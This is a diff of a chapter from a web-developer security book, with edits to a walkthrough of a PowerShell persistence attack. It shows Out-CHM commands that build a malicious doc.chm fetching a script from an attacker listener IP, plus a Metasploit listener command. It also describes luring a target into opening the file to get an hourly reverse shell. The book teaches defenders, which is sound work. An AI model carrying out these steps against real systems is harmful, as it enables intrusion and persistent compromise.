holisticinfosec/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G>
 G> `The term 'ÿþp o w e r s h e l l ' is not recognized as the name of a cmdlet, function, script file, or operable program.
 Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
 At line:1 char:23`
 G>
 G> See the funny characters?
-That is what gave it away.
+That's what gave it away.
 G>
-G> Now we can create our `doc.chm` or what ever you want to call it, informing `Out-CHM` that we want the payload of `doc.chm` to be the script ([`EncodedPersistentScript.ps1`](#EncodedPersistentScript-ps1)) we just created and hosted, that when downloaded and invoked, will persist the contents of [`persistentFetchRunPayload.ps1`](#persistentFetchRunPayload-ps1) in its encoded form to the PowerShell profile that belongs to the user that opened `doc.chm`.
-Run the following commands to create the `doc.chm`:
+G> We now create `doc.chm`, or what ever you want to call it, informing `Out-CHM` that we want the payload of `doc.chm` to be the script ([`EncodedPersistentScript.ps1`](#EncodedPersistentScript-ps1)) we just created and hosted.
+When downloaded and invoked, it will persist the contents of [`persistentFetchRunPayload.ps1`](#persistentFetchRunPayload-ps1) in its encoded form to the PowerShell profile that belongs to the user who opened `doc.chm`.
+Run the following commands to create `doc.chm`:
 G> `PS C:\Source\nishang\Client> Import-Module .\Out-CHM.ps1`
 G> `PS C:\Source\nishang\Client>Out-CHM -PayloadURL http://<listener-attack-ip>/EncodedPersistentScript.ps1 –HHCPath “C:\Program Files (x86)\HTML Help Workshop”`
 G>
-G> Now it is time to setup our listening Metasploit ready to catch the reverse shell when our target runs the `doc.chm`.
+G> Next, we setup our Metasploit listener, ready to catch the reverse shell when our target runs  `doc.chm`.
 We use the same `powershell_msf.rc` resource file that `psmsf` created for us in the [PowerShell Exploitation with Psmsf](#powershell-exploitation-with-psmsf-play) play above.
 G> Start your listener using the `powershell_msf.rc` resource rile:
 G> `msfconsole -r powershell_msf.rc`

 {icon=bomb}
-G> Now you need to get the `doc.chm` onto your targets machine or a network share that your target can access/copy from, and persuade your target to run the `doc.chm`.
+G> The `doc.chm` file must be delivered to your target's machine or a network share that your target can access/copy from, and your target must be persuaded to run it.
 When they do, as discussed above, `EncodedPersistentScript.ps1` will be downloaded and invoked, which will write the embedded encoded contents of `persistentFetchRunPayload.ps1` to the PowerShell profile, and setup a scheduled task.
-When the task fires, as in the previous attacks, the `payload.txt` will be downloaded and its expression invoked, which will cause the reverse shell to be executed.
-The listening Metasploit will catch the shell.
+When the task fires, as in the previous attacks, the `payload.txt` will be downloaded, and its expression invoked, which causes the reverse shell to be executed.
+The Metasploit listener will catch the shell.
 If you have the scheduled task configured to run every hour, then you will get a reverse shell every hour.
-This survives reboots and most other actions any user will take, other than removing the PowerShell profile contents we created or removing the scheduled task.
+This survives reboots and most other actions any user will take, other than removing the PowerShell profile contents we created, or removing the scheduled task.

 The PowerSploit Persistence module offers the following persistence techniques: